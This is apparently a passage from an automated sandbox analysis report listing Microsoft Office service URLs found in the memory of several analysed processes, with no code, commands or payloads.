    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macB
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macX
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/viceC$V
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/viceb$
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office7
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.office.com4V
    Source: 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://config.office.com4VY
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contentstorage.osi.office.net/getofficecarouselcore/index.htmltml
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contentsync.onenote.com/contentsync/v1
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/apiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.netMBI_SSLonedrivemobile.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059122796.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFileil
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileides
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileg
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilerer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059567438.00000248C2CFD000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesN
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesg
